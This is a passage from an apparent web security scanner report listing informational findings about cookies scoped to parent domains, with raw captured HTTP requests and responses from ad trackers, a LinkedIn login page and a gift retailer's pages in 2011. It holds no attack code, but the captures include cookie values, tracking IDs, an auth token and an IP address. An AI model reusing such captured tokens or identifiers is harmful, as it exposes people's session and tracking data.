Set-Cookie: bkc=KJh5ppXnxPWROFe77YEdRf+Jag/jk/tDhVCxEanrn529VjuuyVHHwGsJsm8vRzBQBFAvJGwJKUWbFUzT7UfNFm2pMC1cMZIO8XVruNCyke121n52h+6Wzn1Aon/9FkTsruZFwxXedGe9Tt0znTYjX+G85uoeRcKZFo2q/KbZhpuF4PJn+AkQXB2cl7C1KKtAKrXIJksI5R0MlaRSpeuFdRG928HWRtNX39oZNIBjA4rS8S8myDh2tAcbIyvyIXqc1U5+hWtl2Agj5qknWtf3bdf29EhDj89=; expires=Fri, 02-Mar-2012 01:13:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4G5F2AACXnxf/99T1/x8JjZGZJLPkiLoZCujvOLSkaig7oiQ+J4Q9iBHVZ; expires=Fri, 02-Mar-2012 01:13:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Mon, 05-Sep-2011 01:13:12 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Mon, 05 Sep 2011 01:13:12 GMT
Cache-Control: max-age=86400, private
BK-Server: 160f
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

11.49. http://tr.adinterax.com/re/mcclatchyinteractive%2CSAC_ccul_110425_brand_exp%2CC%3DSAC_CCUL%2CP%3DSAC%2CK%3D696749/0.17714067571796477/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/mcclatchyinteractive%2CSAC_ccul_110425_brand_exp%2CC%3DSAC_CCUL%2CP%3DSAC%2CK%3D696749/0.17714067571796477/0/in%2Cti/ti.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /re/mcclatchyinteractive%2CSAC_ccul_110425_brand_exp%2CC%3DSAC_CCUL%2CP%3DSAC%2CK%3D696749/0.17714067571796477/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:13 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxid=01345f4e62cacd40; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Set-Cookie: adxf=696749@1@221; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.50. http://tu.connect.wunderloop.net/TU/1/1/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tu.connect.wunderloop.net
Path:   /TU/1/1/1/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TU/1/1/1/ HTTP/1.1
Host: tu.connect.wunderloop.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:10 GMT
Server: Apache
P3P: policyref="http://connect.wunderloop.net/w3c/p3p.xml", CP="NOI PSAa PSDa OUR IND UNI CNT"
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 31 Oct 1989 14:06:29 GMT
Last-Modified: Thu, 31 Oct 1989 14:06:29 GMT
Set-Cookie: wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A; expires=Wed, 29-Aug-2012 00:48:10 GMT; domain=.wunderloop.net; Path=/
X-Cnection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

11.51. http://www.bizographics.com/collect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /collect/?fmt=gif&url=reuters.com&pid=501 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
Cache-Control: max-age=0
If-Modified-Since: Thu, 04 Aug 2011 17:51:39 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
If-None-Match: "221d8352905f2c38b3cb2bd191d630b0"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXs4bdFipkUfSaj5XcunNcMDa7Re6IGD4lBvQyxxHPmw0Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQD6vWJNOjnJHrfysIJUvFEEVUJBxdqAyCnhnIK7WDp3tGB8GRrS9YqGZ21tipbuEa4ipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Content-Language: en-US
Date: Sun, 04 Sep 2011 00:48:10 GMT
Location: http://img.bizographics.com/1x1.gif
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/
Set-Cookie: BizoData=Pp1FHRK43ZweORIlfkWqu9Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZiiM5m7MKDWeaj5XcunNcMDa7Re6IGD4lFbK4oBwEGr9Ad6xyMUDLG6hh7sErqHyaoEyKUrunjtqgDfn74jNwcPJZXKAa9DdLgeLHSyEVCqewehdQ95muedOoesP2U0B4uSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfspmIzmbswoNZ5qPldy6c1wwH4DELwm2ipwN9AFjATkbkUDTbwiiAhQOisLU5UVO9T0RLQPyXdljTHnfyBp1sJ7Vvkc46t01cWfT12ipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6nc4wINO1L7830xNl7tETxisz59RGoQec9s3m5pebWcHCAieie; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/
Content-Length: 0
Connection: keep-alive


11.52. https://www.linkedin.com/secure/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.linkedin.com
Path:   /secure/login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /secure/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: leo_auth_token="GST:92Y5C7-Duxr1zGVs1Wv1YxDhPErhhqpepcYFrtwDfIrhAIVsQxwMUh:1315099155:0c843f0a96a8006c044aa7d63d7ac676a0c1e9e0"; Version=1; Max-Age=1799; Expires=Sun, 04-Sep-2011 01:49:14 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:19:15 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965c45525d5f4f58455e445a4a421968;expires=Sun, 04-Sep-2011 01:51:45 GMT;path=/;httponly
Content-Length: 16499

<!DOCTYPE html>
<html lang="en">
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=9">
<meta name="p
...[SNIP]...

11.53. http://www.personalcreations.com/apparel-gifts-her-PHERAPP  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /apparel-gifts-her-PHERAPP

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apparel-gifts-her-PHERAPP HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:25 PM?0&9/3/2011 6:27:59 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:46 PM?0&9/3/2011 6:28:53 PM?0&9/3/2011 6:29:28 PM?0&9/3/2011 6:30:05 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:30:05 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:30:04 GMT
Connection: close
Content-Length: 280083

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.54. http://www.personalcreations.com/grandparents-day-gifts-PGDPDAY  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /grandparents-day-gifts-PGDPDAY

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /grandparents-day-gifts-PGDPDAY HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:40 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:40 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:41 GMT
Connection: close
Content-Length: 243187

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.55. http://www.personalcreations.com/halloween-home-decorations-PHALHOM  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /halloween-home-decorations-PHALHOM

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /halloween-home-decorations-PHALHOM HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:49 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:49 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:49 GMT
Connection: close
Content-Length: 201184

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.56. http://www.personalcreations.com/just-because-gifts-PJBEBSL  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /just-because-gifts-PJBEBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /just-because-gifts-PJBEBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:28:30 PM?0&9/3/2011 6:28:03 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:28:03 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:28:04 GMT
Connection: close
Content-Length: 413498

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.57. http://www.personalcreations.com/personalized-anniversary-gifts-PANNBSL  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-anniversary-gifts-PANNBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-anniversary-gifts-PANNBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:48 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:48 GMT
Connection: close
Content-Length: 381211

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.58. http://www.personalcreations.com/personalized-back-to-school-gifts-PBKDB2S  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-back-to-school-gifts-PBKDB2S

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-back-to-school-gifts-PBKDB2S HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:49 PM?0&9/3/2011 6:19:56 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:56 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:56 GMT
Connection: close
Content-Length: 259186

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.59. http://www.personalcreations.com/personalized-birthday-gifts-PBIRBSL  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-birthday-gifts-PBIRBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-birthday-gifts-PBIRBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:13 PM?0&9/3/2011 6:20:03 PM?0&9/3/2011 6:19:51 PM?0&9/3/2011 6:19:27 PM?0&9/3/2011 6:19:46 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:46 GMT
Connection: close
Content-Length: 411135

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.60. http://www.personalcreations.com/personalized-birthday-gifts-her-PHERBIR  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-birthday-gifts-her-PHERBIR

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-birthday-gifts-her-PHERBIR HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:29:21 PM?0&9/3/2011 6:29:12 PM?0&9/3/2011 6:29:04 PM?0&9/3/2011 6:29:29 PM?0&9/3/2011 6:29:35 PM?0&9/3/2011 6:30:11 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:30:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:30:12 GMT
Connection: close
Content-Length: 318870

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.61. http://www.personalcreations.com/personalized-business-gifts-PBIZGFT  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-business-gifts-PBIZGFT

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-business-gifts-PBIZGFT HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:48 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:37 PM?0&9/3/2011 6:20:23 PM?0&9/3/2011 6:20:48 PM?0&9/3/2011 6:20:46 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:20:45 GMT
Connection: close
Content-Length: 189636

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.62. http://www.personalcreations.com/personalized-christmas-gifts-PCHRBSL  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-christmas-gifts-PCHRBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-christmas-gifts-PCHRBSL HTTP/1.1
Host: www.personalcreations.com
